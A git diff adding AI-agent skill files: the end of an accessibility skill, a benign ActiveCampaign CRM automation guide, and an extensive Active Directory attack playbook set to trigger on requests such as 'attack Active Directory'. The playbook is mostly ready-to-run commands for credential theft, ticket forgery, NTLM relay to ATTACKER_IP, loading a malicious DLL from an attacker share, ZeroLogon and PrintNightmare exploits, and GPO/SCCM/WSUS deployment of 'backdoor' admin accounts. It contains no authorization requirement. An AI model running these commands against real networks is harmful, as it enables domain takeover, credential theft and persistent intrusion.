+ `,
+ )
+ .join("")}
+
+`;
+ }
+}
+```
+
+## Output Format
+
+1. **Accessibility Score**: Overall compliance with WCAG levels
+2. **Violation Report**: Detailed issues with severity and fixes
+3. **Test Results**: Automated and manual test outcomes
+4. **Remediation Guide**: Step-by-step fixes for each issue
+5. **Code Examples**: Accessible component implementations
+
+Focus on creating inclusive experiences that work for all users, regardless of their abilities or assistive technologies.
diff --git a/web-app/public/skills/active-directory-attacks/SKILL.md b/web-app/public/skills/active-directory-attacks/SKILL.md
new file mode 100644
index 00000000..654fbae3
--- /dev/null
+++ b/web-app/public/skills/active-directory-attacks/SKILL.md
@@ -0,0 +1,383 @@
+---
+name: Active Directory Attacks
+description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
+metadata:
+ author: zebbern
+ version: "1.1"
+---
+
+# Active Directory Attacks
+
+## Purpose
+
+Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
+
+## Inputs/Prerequisites
+
+- Kali Linux or Windows attack platform
+- Domain user credentials (for most attacks)
+- Network access to Domain Controller
+- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
+
+## Outputs/Deliverables
+
+- Domain enumeration data
+- Extracted credentials and hashes
+- Kerberos tickets for impersonation
+- Domain Administrator access
+- Persistent access mechanisms
+
+---
+
+## Essential Tools
+
+| Tool | Purpose |
+|------|---------|
+| BloodHound | AD attack path visualization |
+| Impacket | Python AD attack tools |
+| Mimikatz | Credential extraction |
+| Rubeus | Kerberos attacks |
+| CrackMapExec | Network exploitation |
+| PowerView | AD enumeration |
+| Responder | LLMNR/NBT-NS poisoning |
+
+---
+
+## Core Workflow
+
+### Step 1: Kerberos Clock Sync
+
+Kerberos requires clock synchronization (±5 minutes):
+
+```bash
+# Detect clock skew
+nmap -sT 10.10.10.10 -p445 --script smb2-time
+
+# Fix clock on Linux
+sudo date -s "14 APR 2024 18:25:16"
+
+# Fix clock on Windows
+net time /domain /set
+
+# Fake clock without changing system time
+faketime -f '+8h'
+```
+
+### Step 2: AD Reconnaissance with BloodHound
+
+```bash
+# Start BloodHound
+neo4j console
+bloodhound --no-sandbox
+
+# Collect data with SharpHound
+.\SharpHound.exe -c All
+.\SharpHound.exe -c All --ldapusername user --ldappassword pass
+
+# Python collector (from Linux)
+bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
+```
+
+### Step 3: PowerView Enumeration
+
+```powershell
+# Get domain info
+Get-NetDomain
+Get-DomainSID
+Get-NetDomainController
+
+# Enumerate users
+Get-NetUser
+Get-NetUser -SamAccountName targetuser
+Get-UserProperty -Properties pwdlastset
+
+# Enumerate groups
+Get-NetGroupMember -GroupName "Domain Admins"
+Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
+
+# Find local admin access
+Find-LocalAdminAccess -Verbose
+
+# User hunting
+Invoke-UserHunter
+Invoke-UserHunter -Stealth
+```
+
+---
+
+## Credential Attacks
+
+### Password Spraying
+
+```bash
+# Using kerbrute
+./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
+
+# Using CrackMapExec
+crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
+```
+
+### Kerberoasting
+
+Extract service account TGS tickets and crack offline:
+
+```bash
+# Impacket
+GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
+
+# Rubeus
+.\Rubeus.exe kerberoast /outfile:hashes.txt
+
+# CrackMapExec
+crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
+
+# Crack with hashcat
+hashcat -m 13100 hashes.txt rockyou.txt
+```
+
+### AS-REP Roasting
+
+Target accounts with "Do not require Kerberos preauthentication":
+
+```bash
+# Impacket
+GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
+
+# Rubeus
+.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
+
+# Crack with hashcat
+hashcat -m 18200 hashes.txt rockyou.txt
+```
+
+### DCSync Attack
+
+Extract credentials directly from DC (requires Replicating Directory Changes rights):
+
+```bash
+# Impacket
+secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
+
+# Mimikatz
+lsadump::dcsync /domain:domain.local /user:krbtgt
+lsadump::dcsync /domain:domain.local /user:Administrator
+```
+
+---
+
+## Kerberos Ticket Attacks
+
+### Pass-the-Ticket (Golden Ticket)
+
+Forge TGT with krbtgt hash for any user:
+
+```powershell
+# Get krbtgt hash via DCSync first
+# Mimikatz - Create Golden Ticket
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
+
+# Impacket
+ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
+export KRB5CCNAME=Administrator.ccache
+psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
+```
+
+### Silver Ticket
+
+Forge TGS for specific service:
+
+```powershell
+# Mimikatz
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
+```
+
+### Pass-the-Hash
+
+```bash
+# Impacket
+psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+
+# CrackMapExec
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
+```
+
+### OverPass-the-Hash
+
+Convert NTLM hash to Kerberos ticket:
+
+```bash
+# Impacket
+getTGT.py domain.local/user -hashes :NTHASH
+export KRB5CCNAME=user.ccache
+
+# Rubeus
+.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
+```
+
+---
+
+## NTLM Relay Attacks
+
+### Responder + ntlmrelayx
+
+```bash
+# Start Responder (disable SMB/HTTP for relay)
+responder -I eth0 -wrf
+
+# Start relay
+ntlmrelayx.py -tf targets.txt -smb2support
+
+# LDAP relay for delegation attack
+ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
+```
+
+### SMB Signing Check
+
+```bash
+crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
+```
+
+---
+
+## Certificate Services Attacks (AD CS)
+
+### ESC1 - Misconfigured Templates
+
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
+
+# Exploit ESC1
+certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
+
+# Authenticate with certificate
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
+```
+
+### ESC8 - Web Enrollment Relay
+
+```bash
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+```
+
+---
+
+## Critical CVEs
+
+### ZeroLogon (CVE-2020-1472)
+
+```bash
+# Check vulnerability
+crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
+
+# Exploit
+python3 cve-2020-1472-exploit.py DC01 10.10.10.10
+
+# Extract hashes
+secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
+
+# Restore password (important!)
+python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
+```
+
+### PrintNightmare (CVE-2021-1675)
+
+```bash
+# Check for vulnerability
+rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
+
+# Exploit (requires hosting malicious DLL)
+python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
+```
+
+### samAccountName Spoofing (CVE-2021-42278/42287)
+
+```bash
+# Automated exploitation
+python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
+```
+
+---
+
+## Quick Reference
+
+| Attack | Tool | Command |
+|--------|------|---------|
+| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
+| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
+| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
+| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
+| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
+| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
+
+---
+
+## Constraints
+
+**Must:**
+- Synchronize time with DC before Kerberos attacks
+- Have valid domain credentials for most attacks
+- Document all compromised accounts
+
+**Must Not:**
+- Lock out accounts with excessive password spraying
+- Modify production AD objects without approval
+- Leave Golden Tickets without documentation
+
+**Should:**
+- Run BloodHound for attack path discovery
+- Check for SMB signing before relay attacks
+- Verify patch levels for CVE exploitation
+
+---
+
+## Examples
+
+### Example 1: Domain Compromise via Kerberoasting
+
+```bash
+# 1. Find service accounts with SPNs
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
+
+# 2. Request TGS tickets
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
+
+# 3. Crack tickets
+hashcat -m 13100 tgs.txt rockyou.txt
+
+# 4. Use cracked service account
+psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
+```
+
+### Example 2: NTLM Relay to LDAP
+
+```bash
+# 1. Start relay targeting LDAP
+ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
+
+# 2. Trigger authentication (e.g., via PrinterBug)
+python3 printerbug.py domain.local/user:pass@target 10.10.10.12
+
+# 3. Use created machine account for RBCD attack
+```
+
+---
+
+## Troubleshooting
+
+| Issue | Solution |
+|-------|----------|
+| Clock skew too great | Sync time with DC or use faketime |
+| Kerberoasting returns empty | No service accounts with SPNs |
+| DCSync access denied | Need Replicating Directory Changes rights |
+| NTLM relay fails | Check SMB signing, try LDAP target |
+| BloodHound empty | Verify collector ran with correct creds |
+
+---
+
+## Additional Resources
+
+For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
diff --git a/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md b/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md
new file mode 100644
index 00000000..2428ecf0
--- /dev/null
+++ b/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md
@@ -0,0 +1,382 @@
+# Advanced Active Directory Attacks Reference
+
+## Table of Contents
+1. [Delegation Attacks](#delegation-attacks)
+2. [Group Policy Object Abuse](#group-policy-object-abuse)
+3. [RODC Attacks](#rodc-attacks)
+4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
+5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
+6. [Trust Relationship Attacks](#trust-relationship-attacks)
+7. [ADFS Golden SAML](#adfs-golden-saml)
+8. [Credential Sources](#credential-sources)
+9. [Linux AD Integration](#linux-ad-integration)
+
+---
+
+## Delegation Attacks
+
+### Unconstrained Delegation
+
+When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
+
+**Find Delegation:**
+```powershell
+# PowerShell
+Get-ADComputer -Filter {TrustedForDelegation -eq $True}
+
+# BloodHound
+MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
+```
+
+**SpoolService Abuse:**
+```bash
+# Check spooler service
+ls \\dc01\pipe\spoolss
+
+# Trigger with SpoolSample
+.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
+
+# Or with printerbug.py
+python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
+```
+
+**Monitor with Rubeus:**
+```powershell
+Rubeus.exe monitor /interval:1
+```
+
+### Constrained Delegation
+
+**Identify:**
+```powershell
+Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
+```
+
+**Exploit with Rubeus:**
+```powershell
+# S4U2 attack
+Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+**Exploit with Impacket:**
+```bash
+getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
+```
+
+### Resource-Based Constrained Delegation (RBCD)
+
+```powershell
+# Create machine account
+New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
+
+# Set delegation
+Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
+
+# Get ticket
+.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+---
+
+## Group Policy Object Abuse
+
+### Find Vulnerable GPOs
+
+```powershell
+Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
+```
+
+### Abuse with SharpGPOAbuse
+
+```powershell
+# Add local admin
+.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add user rights
+.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add immediate task
+.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
+```
+
+### Abuse with pyGPOAbuse (Linux)
+
+```bash
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+```
+
+---
+
+## RODC Attacks
+
+### RODC Golden Ticket
+
+RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
+
+### RODC Key List Attack
+
+**Requirements:**
+- krbtgt credentials of the RODC (-rodcKey)
+- ID of the krbtgt account of the RODC (-rodcNo)
+
+```bash
+# Impacket keylistattack
+keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
+
+# Using secretsdump with keylist
+secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
+```
+
+**Using Rubeus:**
+```powershell
+Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
+```
+
+---
+
+## SCCM/WSUS Deployment
+
+### SCCM Attack with MalSCCM
+
+```bash
+# Locate SCCM server
+MalSCCM.exe locate
+
+# Enumerate targets
+MalSCCM.exe inspect /all
+MalSCCM.exe inspect /computers
+
+# Create target group
+MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
+MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
+
+# Create malicious app
+MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
+
+# Deploy
+MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
+
+# Force checkin
+MalSCCM.exe checkin /groupname:TargetGroup
+
+# Cleanup
+MalSCCM.exe app /cleanup /name:backdoor
+MalSCCM.exe group /delete /groupname:TargetGroup
+```
+
+### SCCM Network Access Accounts
+
+```powershell
+# Find SCCM blob
+Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
+
+# Decrypt with SharpSCCM
+.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
+```
+
+### WSUS Deployment Attack
+
+```bash
+# Using SharpWSUS
+SharpWSUS.exe locate
+SharpWSUS.exe inspect
+
+# Create malicious update
+SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
+
+# Deploy to target
+SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+
+# Check status
+SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
+
+# Cleanup
+SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+```
+
+---
+
+## AD Certificate Services (ADCS)
+
+### ESC1 - Misconfigured Templates
+
+Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
+
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
+
+# Request certificate as admin
+certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
+
+# Authenticate
+certipy auth -pfx administrator.pfx -dc-ip DC_IP
+```
+
+### ESC4 - ACL Vulnerabilities
+
+```python
+# Check for WriteProperty
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
+
+# Add ENROLLEE_SUPPLIES_SUBJECT flag
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+
+# Perform ESC1, then restore
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
+```
+
+### ESC8 - NTLM Relay to Web Enrollment
+
+```bash
+# Start relay
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+
+# Coerce authentication
+python3 petitpotam.py ATTACKER_IP DC_IP
+
+# Use certificate
+Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
+```
+
+### Shadow Credentials
+
+```bash
+# Add Key Credential (pyWhisker)
+python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
+
+# Get TGT with PKINIT
+python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
+
+# Get NT hash
+export KRB5CCNAME=target.ccache
+python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
+```
+
+---
+
+## Trust Relationship Attacks
+
+### Child to Parent Domain (SID History)
+
+```powershell
+# Get Enterprise Admins SID from parent
+$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
+
+# Create Golden Ticket with SID History
+kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
+```
+
+### Forest to Forest (Trust Ticket)
+
+```bash
+# Dump trust key
+lsadump::trust /patch
+
+# Forge inter-realm TGT
+kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
+
+# Use trust ticket
+.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
+```
+
+---
+
+## ADFS Golden SAML
+
+**Requirements:**
+- ADFS service account access
+- Token signing certificate (PFX + decryption password)
+
+```bash
+# Dump with ADFSDump
+.\ADFSDump.exe
+
+# Forge SAML token
+python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
+```
+
+---
+
+## Credential Sources
+
+### LAPS Password
+
+```powershell
+# PowerShell
+Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
+
+# CrackMapExec
+crackmapexec ldap DC_IP -u user -p password -M laps
+```
+
+### GMSA Password
+
+```powershell
+# PowerShell + DSInternals
+$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
+$mp = $gmsa.'msDS-ManagedPassword'
+ConvertFrom-ADManagedPasswordBlob $mp
+```
+
+```bash
+# Linux with bloodyAD
+python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
+```
+
+### Group Policy Preferences (GPP)
+
+```bash
+# Find in SYSVOL
+findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
+
+# Decrypt
+python3 Get-GPPPassword.py -no-pass 'DC_IP'
+```
+
+### DSRM Credentials
+
+```powershell
+# Dump DSRM hash
+Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
+
+# Enable DSRM admin logon
+Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
+```
+
+---
+
+## Linux AD Integration
+
+### CCACHE Ticket Reuse
+
+```bash
+# Find tickets
+ls /tmp/ | grep krb5cc
+
+# Use ticket
+export KRB5CCNAME=/tmp/krb5cc_1000
+```
+
+### Extract from Keytab
+
+```bash
+# List keys
+klist -k /etc/krb5.keytab
+
+# Extract with KeyTabExtract
+python3 keytabextract.py /etc/krb5.keytab
+```
+
+### Extract from SSSD
+
+```bash
+# Database location
+/var/lib/sss/secrets/secrets.ldb
+
+# Key location
+/var/lib/sss/secrets/.secrets.mkey
+
+# Extract
+python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
+```
diff --git a/web-app/public/skills/activecampaign-automation/SKILL.md b/web-app/public/skills/activecampaign-automation/SKILL.md
new file mode 100644
index 00000000..f618bc0e
--- /dev/null
+++ b/web-app/public/skills/activecampaign-automation/SKILL.md
@@ -0,0 +1,209 @@
+---
+name: activecampaign-automation
+description: "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas."
+requires:
+ mcp: [rube]
+---
+
+# ActiveCampaign Automation via Rube MCP
+
+Automate ActiveCampaign CRM and marketing automation operations through Composio's ActiveCampaign toolkit via Rube MCP.
+
+## Prerequisites
+
+- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
+- Active ActiveCampaign connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
+- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
+
+## Setup
+
+**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
+
+
+1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
+2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
+3. If connection is not ACTIVE, follow the returned auth link to complete ActiveCampaign authentication
+4. Confirm connection status shows ACTIVE before running any workflows
+
+## Core Workflows
+
+### 1. Create and Find Contacts
+
+**When to use**: User wants to create new contacts or look up existing ones
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Search for an existing contact [Optional]
+2. `ACTIVE_CAMPAIGN_CREATE_CONTACT` - Create a new contact [Required]
+
+**Key parameters for find**:
+- `email`: Search by email address
+- `id`: Search by ActiveCampaign contact ID
+- `phone`: Search by phone number
+
+**Key parameters for create**:
+- `email`: Contact email address (required)
+- `first_name`: Contact first name
+- `last_name`: Contact last name
+- `phone`: Contact phone number
+- `organization_name`: Contact's organization
+- `job_title`: Contact's job title
+- `tags`: Comma-separated list of tags to apply
+
+**Pitfalls**:
+- `email` is the only required field for contact creation
+- Phone search uses a general search parameter internally; it may return partial matches
+- When combining `email` and `phone` in FIND_CONTACT, results are filtered client-side
+- Tags provided during creation are applied immediately
+- Creating a contact with an existing email may update the existing contact
+
+### 2. Manage Contact Tags
+
+**When to use**: User wants to add or remove tags from contacts
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find contact by email or ID [Prerequisite]
+2. `ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG` - Add or remove tags [Required]
+
+**Key parameters**:
+- `action`: 'Add' or 'Remove' (required)
+- `tags`: Tag names as comma-separated string or array of strings (required)
+- `contact_id`: Contact ID (provide this or contact_email)
+- `contact_email`: Contact email address (alternative to contact_id)
+
+**Pitfalls**:
+- `action` values are capitalized: 'Add' or 'Remove' (not lowercase)
+- Tags can be a comma-separated string ('tag1, tag2') or an array (['tag1', 'tag2'])
+- Either `contact_id` or `contact_email` must be provided; `contact_id` takes precedence
+- Adding a tag that does not exist creates it automatically
+- Removing a non-existent tag is a no-op (does not error)
+
+### 3. Manage List Subscriptions
+
+**When to use**: User wants to subscribe or unsubscribe contacts from lists
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact [Prerequisite]
+2. `ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION` - Subscribe or unsubscribe [Required]
+
+**Key parameters**:
+- `action`: 'subscribe' or 'unsubscribe' (required)
+- `list_id`: Numeric list ID string (required)
+- `email`: Contact email address (provide this or contact_id)
+- `contact_id`: Numeric contact ID string (alternative to email)
+
+**Pitfalls**:
+- `action` values are lowercase: 'subscribe' or 'unsubscribe'
+- `list_id` is a numeric string (e.g., '2'), not the list name
+- List IDs can be retrieved via the GET /api/3/lists endpoint (not available as a Composio tool; use the ActiveCampaign UI)
+- If both `email` and `contact_id` are provided, `contact_id` takes precedence
+- Unsubscribing changes status to '2' (unsubscribed) but the relationship record persists
+
+### 4. Add Contacts to Automations
+
+**When to use**: User wants to enroll a contact in an automation workflow
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Verify contact exists [Prerequisite]
+2. `ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION` - Enroll contact in automation [Required]
+
+**Key parameters**:
+- `contact_email`: Email of the contact to enroll (required)
+- `automation_id`: ID of the target automation (required)
+
+**Pitfalls**:
+- The contact must already exist in ActiveCampaign
+- Automations can only be created through the ActiveCampaign UI, not via API
+- `automation_id` must reference an existing, active automation
+- The tool performs a two-step process: lookup contact by email, then enroll
+- Automation IDs can be found in the ActiveCampaign UI or via GET /api/3/automations
+
+### 5. Create Contact Tasks
+
+**When to use**: User wants to create follow-up tasks associated with contacts
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact to associate the task with [Prerequisite]
+2. `ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK` - Create the task [Required]
+
+**Key parameters**:
+- `relid`: Contact ID to associate the task with (required)
+- `duedate`: Due date in ISO 8601 format with timezone (required, e.g., '2025-01-15T14:30:00-05:00')
+- `dealTasktype`: Task type ID based on available types (required)
+- `title`: Task title
+- `note`: Task description/content
+- `assignee`: User ID to assign the task to
+- `edate`: End date in ISO 8601 format (must be later than duedate)
+- `status`: 0 for incomplete, 1 for complete
+
+**Pitfalls**:
+- `duedate` must be a valid ISO 8601 datetime with timezone offset; do NOT use placeholder values
+- `edate` must be later than `duedate`
+- `dealTasktype` is a string ID referencing task types configured in ActiveCampaign
+- `relid` is the numeric contact ID, not the email address
+- `assignee` is a user ID; resolve user names to IDs via the ActiveCampaign UI
+
+## Common Patterns
+
+### Contact Lookup Flow
+
+```
+1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
+2. If found, extract contact ID for subsequent operations
+3. If not found, create contact with ACTIVE_CAMPAIGN_CREATE_CONTACT
+4. Use contact ID for tags, subscriptions, or automations
+```
+
+### Bulk Contact Tagging
+
+```
+1. For each contact, call ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG
+2. Use contact_email to avoid separate lookup calls
+3. Batch with reasonable delays to respect rate limits
+```
+
+### ID Resolution
+
+**Contact email -> Contact ID**:
+```
+1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
+2. Extract id from the response
+```
+
+## Known Pitfalls
+
+**Action Capitalization**:
+- Tag actions: 'Add', 'Remove' (capitalized)
+- Subscription actions: 'subscribe', 'unsubscribe' (lowercase)
+- Mixing up capitalization causes errors
+
+**ID Types**:
+- Contact IDs: numeric strings (e.g., '123')
+- List IDs: numeric strings
+- Automation IDs: numeric strings
+- All IDs should be passed as strings, not integers
+
+**Automations**:
+- Automations cannot be created via API; only enrollment is possible
+- Automation must be active to accept new contacts
+- Enrolling a contact already in the automation may have no effect
+
+**Rate Limits**:
+- ActiveCampaign API has rate limits per account
+- Implement backoff on 429 responses
+- Batch operations should be spaced appropriately
+
+**Response Parsing**:
+- Response data may be nested under `data` or `data.data`
+- Parse defensively with fallback patterns
+- Contact search may return multiple results; match by email for accuracy
+
+## Quick Reference
+
+| Task | Tool Slug | Key Params |
+|------|-----------|------------|
+| Find contact | ACTIVE_CAMPAIGN_FIND_CONTACT | email, id, phone |
+| Create contact | ACTIVE_CAMPAIGN_CREATE_CONTACT | email, first_name, last_name, tags |
+| Add/remove tags | ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG | action, tags, contact_email |
+| Subscribe/unsubscribe | ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION | action, list_id, email |
+| Add to automation | ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION | contact_email, automation_id |
+| Create task | ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK | relid, duedate, dealTasktype, title |
diff --git a/web-app/public/skills/address-github-comments/SKILL.md b/web-app/public/skills/address-github-comments/SKILL.md
new file mode 100644
index 00000000..424fab73
--- /dev/null
+++ b/web-app/public/skills/address-github-comments/SKILL.md
@@ -0,0 +1,55 @@
+---
+name: address-github-comments
+description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
+---
+
+# Address GitHub Comments
+
+## Overview
+
